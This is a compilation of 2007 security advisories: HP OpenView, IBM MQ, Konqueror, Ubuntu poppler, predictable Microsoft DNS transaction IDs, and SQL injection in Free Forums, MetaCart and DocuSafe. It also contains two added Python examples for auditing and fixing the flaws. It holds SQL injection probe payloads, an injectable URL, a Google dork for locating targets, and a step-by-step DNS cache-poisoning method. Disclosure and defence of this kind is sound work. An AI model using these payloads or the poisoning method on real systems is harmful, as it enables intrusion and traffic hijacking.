-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01269450 Version: 1 HPSBMA02288 SSRT071465 rev.1 - HP OpenView Operations (OVO) Running on HP-UX and Solaris, Remote Unauthorized Access, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-11-13 Last Updated: 2007-11-13 Potential Security Impact: Remote unauthorized access, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in OpenView Operations (OVO) running on HP-UX and Solaris. These vulnerabilities may be exploited remotely to gain unauthorized access or to create a Denial of Service (DoS). References: SUN Alert 102995, 102997, CVE-2007-3922, CVE-2007-3698 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Operations(OVO) 7.1X and 8.X running on HP-UX B.11.11, B.11.23, B.11.31, and Solaris. BACKGROUND Note: The following is for use by the HP-UX Software Assistant. Only the HP-UX versions are listed. AFFECTED VERSIONS For OVO 7.1X HP-UX B.11.11 = OVOPC-WWW.OVOPC-WWW-GUI action: install PHSS_37197 or subsequent For OVO 8.X HP-UX B.11.11 HP-UX B.11.23 (PA) = OVOPC-WWW.OVOPC-WWW-GUI action: install PHSS_37183 or subsequent HP-UX B.11.23 (IA) HP-UX B.11.31 = OVOPC-WWW.OVOPC-WWW-GUI action: install PHSS_37182 or subsequent END AFFECTED VERSIONS RESOLUTION HP has provided the following patches to resolve the vulnerabilities. 
The patches can be downloaded from http://support.openview.hp.com/patches/ OVO 7.1X HP-UX B.11.11 PHSS_37197 or subsequent OVO 7.1X Solaris ITOSOL_00619 or subsequent OVO 8.X HP-UX B.11.11 PHSS_37183 or subsequent OVO 8.X HP-UX B.11.23 (PA) PHSS_37183 or subsequent OVO 8.X HP-UX B.11.23 (IA) PHSS_37182 or subsequent OVO 8.X HP-UX B.11.31 PHSS_37182 or subsequent OVO 8.X Solaris ITOSOL_00618 or subsequent MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Version: 1 (rev.1) - 13 November 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. 
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the ap
Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0
IRM, leaders in messaging systems security, have discovered six remote vulnerabilities in IBM WebSphere MQ 6.0. The vulnerabilities are currently being investigated by IBM and once patches have been developed, advisories will be published including full technical details and links to patch download information. More information is available here: http://www.irmplc.com/index.php/158-Messaging-System-Security
Konqueror Remote Denial Of Service
Application: Konqueror <= 3.5.6
Web Site: http://www.konqueror.org/
Platform: Unix
Bug: Remote Denial of Service

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits

1) Introduction

"Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)."

2) Bug

Konqueror doesn't handle big cookies, so when a big cookie is sent, Konqueror will crash.

3) Proof of concept

Proof of concept example:

4) Greets

Berga, team soh, #futurezone, #soh

5) Credits

Laurent Gaffié
Free Forums "search" Sql Injection
http://Aria-Security.net
Aria-Security Team

Free Forums Sql Injection
Vendor: http://www.nvecs.com/forums

The search parameter has an SQL injection.

example:
'having 1=1--

result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'.

or just a simple '

[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.

Regards,
The-0utl4w
Credit Goes to Aria-Security Team
[USN-542-1] poppler vulnerabilities
===
Ubuntu Security Notice USN-542-1
November 14, 2007
poppler vulnerabilities
CVE-2007-4352, CVE-2007-5392, CVE-2007-5393
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libpoppler1  0.5.1-0ubuntu7.3

Ubuntu 6.10:
  libpoppler1  0.5.4-0ubuntu4.3

Ubuntu 7.04:
  libpoppler1  0.5.4-0ubuntu8.2

Ubuntu 7.10:
  libpoppler2  0.6-0ubuntu2.1

After a standard system upgrade you need to restart your session to effect the necessary changes.

Details follow:

Secunia Research discovered several vulnerabilities in poppler. If a user were tricked into loading a specially crafted PDF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the user's privileges in applications linked against poppler.

Updated packages for Ubuntu 6.06 LTS:
Predictable DNS transaction IDs in Microsoft DNS Server
1) Summary

Affected software: Microsoft Windows 2003 SP2, Microsoft Windows 2000 SP4 Server
Vendor URL: www.microsoft.com
Severity: Medium
References: Microsoft Security Bulletin MS07-062, CVE-2007-3898

2) Vulnerability Description

Microsoft DNS server generates predictable DNS transaction IDs. If the server is configured to allow recursive queries, it is possible to insert fake records into the DNS cache (DNS cache poisoning) by guessing the next transaction ID that the server will use and sending a spoofed DNS reply to the server.

To observe the transaction IDs an attacker needs to control a DNS server that is authoritative for some domain and to be able to send recursive queries to the caching Microsoft DNS server. When an attacker sends a recursive query to a caching name server, the caching server will find the server authoritative for the zone and send the request to the authoritative name server. If the attacker can predict the transaction ID of the request that the caching server sends, he can generate spoofed replies. The caching server will accept the spoofed reply as coming from the authoritative name server and cache the fake data.

The attack scenario is as follows. The attacker controls the authoritative name server for some zone, in our example cache-poisoning.net. The victim has a recursive DNS server that the attacker can query (ns.victim.com). The victim's server runs Microsoft DNS server. The attacker wants the victim's DNS cache to think that www.hotmail.com has IP address 127.0.0.1 (or any other).

First the attacker gathers a sample of DNS transaction IDs that ns.victim.com uses for outgoing queries. He makes a number of recursive queries to ns.victim.com for hosts in the cache-poisoning.net zone. Ns.victim.com will query the name server for cache-poisoning.net. The attacker records the transaction IDs of the requests sent to the name server of cache-poisoning.net by ns.victim.com. Microsoft DNS transaction IDs follow a certain pattern.
There seem to be 8 independent counters that are randomly incremented. Each transaction ID is taken from a randomly chosen counter. So, there are 8 sequences of randomly incrementing numbers. The sample of transaction IDs below illustrates that:

15222 - sequence 1
13177 - sequence 2
2944 - sequence 3
13197 - sequence 2, 13197 > 13177, increment = 20
9108 - sequence 4
13208 - sequence 2, 13208 > 13197, increment = 11
15268 - sequence 5
9131 - sequence 4, 9131 > 9108, increment = 23
7094 - sequence 6
15291 - sequence 5, increment = 23
960 - sequence 7
15309 - sequence 5, increment = 18
980 - sequence 7, increment = 20
3032 - sequence 8
992 - sequence 7, increment = 12
...

Having gathered a small sample of transaction IDs (50 to 100 is enough) used by the cache, the attacker can record the state of each of the 8 counters on the victim server. The attacker will then query the victim server for the record he is trying to spoof, for example www.hotmail.com. The victim cache will send a query to the authoritative name server for hotmail.com. At the same time the attacker will send a number of spoofed DNS replies. The replies will have a spoofed source address (appearing to come from the name server for hotmail.com), fake data (saying that www.hotmail.com is 127.0.0.1) and DNS transaction IDs starting from the recorded values of the counters up to counter+500 (or more). In our testing, the attacker has a very good chance of hitting the right transaction ID. If the reply with the right transaction ID spoofed by the attacker arrives before the reply from the real server, the victim cache will believe the spoofed reply and cache it.

The attack is made easier because Microsoft DNS server uses a fixed source port for the queries (so the attacker doesn't need to guess the source port) and usually queries the first name server for the domain (so the attacker only has to spoof the replies from one IP address). In our testing we were able to reliably inject spoofed replies into the cache.
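The counter pattern described above can be checked for on one's own resolver: capture a sample of its outgoing transaction IDs and see whether they cluster into a few slowly incrementing sequences (the pattern above) or spread out like uniformly random 16-bit values. The audit helper below is an added example, not the advisory's tooling; the step bound of 32 is an assumption drawn from the increments of 11 to 23 in the sample, the second sample is constructed, and the 25% flagging threshold is a chosen heuristic.

```python
# The transaction-ID sample quoted in the advisory, in observation order.
ADVISORY_SAMPLE = [15222, 13177, 2944, 13197, 9108, 13208, 15268, 9131,
                   7094, 15291, 960, 15309, 980, 3032, 992]

# Constructed sample with no ID within MAX_STEP above an earlier one, standing
# in for a resolver whose IDs are drawn uniformly at random.
RANDOM_LIKE_SAMPLE = [41233, 5, 60000, 21000, 33333, 1024, 50000, 12000,
                      65000, 30000]

# Assumption: a counter advances by a small amount per use; the advisory's
# sample shows increments of 11 to 23, so 32 is used as the bound here.
MAX_STEP = 32


def cluster_sequences(ids, max_step=MAX_STEP):
    """Greedily attribute each ID to the first counter it exceeds by at most
    max_step, otherwise open a new counter. Returns (sequences, owner) where
    owner[i] is the index of the sequence the i-th sample was assigned to."""
    sequences, owner = [], []
    for tid in ids:
        for idx, seq in enumerate(sequences):
            if 0 < tid - seq[-1] <= max_step:
                seq.append(tid)
                owner.append(idx)
                break
        else:
            sequences.append([tid])
            owner.append(len(sequences) - 1)
    return sequences, owner


def continuation_fraction(ids, max_step=MAX_STEP):
    """Share of samples that continued an already-seen counter. For uniformly
    random 16-bit IDs this stays near zero; for a handful of counters it is
    large even in a short sample (7 of 15 for the advisory's sample)."""
    sequences, _ = cluster_sequences(ids, max_step)
    continued = sum(len(seq) - 1 for seq in sequences)
    return continued / len(ids)


def looks_like_counters(ids, max_step=MAX_STEP, threshold=0.25):
    """Flag a sample whose continuation fraction reaches the threshold
    (the threshold is a chosen heuristic, not from the advisory)."""
    return continuation_fraction(ids, max_step) >= threshold


if __name__ == "__main__":
    seqs, owner = cluster_sequences(ADVISORY_SAMPLE)
    # Prints 8 counters and the same sequence numbers the advisory assigns.
    print(len(seqs), "counters;", [o + 1 for o in owner])
```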
The success of the attack depends on how busy a DNS cache is. If it is performing a lot of queries (using up transaction IDs) the attacker will only see a small fraction of the IDs. It will be more difficult for the attacker to figure out the state of the counters and to predict the value of the transaction IDs.

It is commonly believed that if a caching DNS server is behind a firewall and it is not possible to query it from the outside, it would not be possible to perform a cache poisoning attack like the one discussed above. Unfortunately, this is not the case. An attacker can create a web page and entice someone inside the firewall to surf to this page. The page will contain images located at hosts in an attacker-controlled domain. For example:

http://h1.cache-poisoning.net/image.gif
http://h2.cache-poisoning.net/image.gif
...
http://h100.cache-poisoning.net/image.gif

When the victim's browser renders the page, it will make DNS queries to the DNS cache. The DNS cache will make queries to the name server for
Aria-Security.Net: MetaCart SQL Injection
Aria-Security Team, http://Aria-Security.net

Shout Outs: AurA, imm02tal
Vendor: http://metalinks.com/

http://site.ltd/metacartpath/productsByCategory.asp?intCatalogID=['SQL INJECTION]

Regards,
The-0utl4w
Credits Goes To Aria-Security.Net
DocuSafe "Search" SQL Injection
Aria-Security Team, http://Aria-Security.net

Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System

Insert your command in the "search" section.

example:
'having 1=1--

Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

or
'group by tblMain.fldArtNr having 1=1--

result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr) Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
/includes/common.asp, line 62

Regards,
The-0utl4w
Credits Goes To Aria-Security.Net
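The Free Forums and DocuSafe reports above show the same defect: the search term is concatenated into a LIKE clause and the database driver's syntax error is echoed to the user. The example below is added here and is not the vendors' code; it is a Python/sqlite3 stand-in (the originals are classic ASP on Access) with a constructed tblMain table, showing the vulnerable concatenation beside a parameterised, wildcard-escaped version that treats the same probes as plain data.

```python
import sqlite3

# Constructed stand-in for the vulnerable search page: the term is spliced
# into a LIKE clause, combining the %...% shape from the Free Forums error
# with the table and column names from the DocuSafe error.
def build_vulnerable_query(term):
    return ("SELECT fldArtNr FROM tblMain "
            f"WHERE ((tblMain.fldArtNr) Like '%{term}%') "
            "ORDER BY tblMain.fldArtNr")


def search_vulnerable(conn, term):
    return conn.execute(build_vulnerable_query(term)).fetchall()


def search_safe(conn, term):
    # Bind the term as a parameter so it is a value, never SQL text, and
    # escape LIKE metacharacters so input cannot widen the match either.
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    sql = ("SELECT fldArtNr FROM tblMain "
           "WHERE fldArtNr LIKE ? ESCAPE '\\' ORDER BY fldArtNr")
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


def make_db():
    # Constructed sample rows; fldKDSrev is only there to mirror the error.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblMain (fldArtNr TEXT, fldKDSrev INTEGER)")
    conn.executemany("INSERT INTO tblMain VALUES (?, ?)",
                     [("ART-100", 1), ("ART-200", 2), ("having", 3)])
    conn.commit()
    return conn


def demo_vulnerable(term):
    """Run the concatenated query. A probe such as 'having 1=1-- breaks the
    statement, and the database error (SQLite's here, the Access driver's
    in the reports) is exactly what the page leaked back to the user."""
    try:
        search_vulnerable(make_db(), term)
        return "ok"
    except sqlite3.Error as exc:
        return f"syntax error leaked: {exc}"


if __name__ == "__main__":
    print(demo_vulnerable("'having 1=1--"))
    print(search_safe(make_db(), "'having 1=1--"))  # [] : treated as data
```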